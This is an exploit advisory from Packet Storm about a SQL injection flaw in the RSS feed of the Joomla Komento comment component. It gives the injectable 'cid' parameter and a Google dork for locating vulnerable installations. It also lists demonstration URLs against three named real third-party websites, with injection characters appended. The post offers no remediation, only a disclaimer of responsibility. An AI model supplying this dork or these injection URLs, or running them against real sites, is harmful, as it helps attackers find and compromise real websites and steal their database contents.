Joomla Komento component suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
da2e30199ede167429941d49b5f38f2994e7491d8299dab08a500015ff03303f###################################################################################
# Exploit Title: Joomla component komento Sql Inection Vulnerability
#
# Google Dork:inurl:component/komento/
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : http://stackideas.com/komento.html
#
# Tested on: all
#
###################################################################################
$
$ Author will be not responsible for any damage.
$
###################################################################################
========================================
Komento is a lightweight Joomla comment extension to manage user comments in
articles, blogs, and more.
Vulnerability is in Rss Feed :
component/komento/?view=rss&format=feed&component=com_content&cid=[id][sql
injection]
D3M0 :
http://keep-it-sexy.com/component/komento/rss?format=feed&component=com_content&cid=152%27
http://www.bonyannew.ir/component/komento/?view=rss&format=feed&component=com_content&cid=52%27
http://www.plazaris.com/component/komento/?view=rss&format=feed&component=com_content&cid=93%27
===============Crim3R@Att.Net===========
$home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed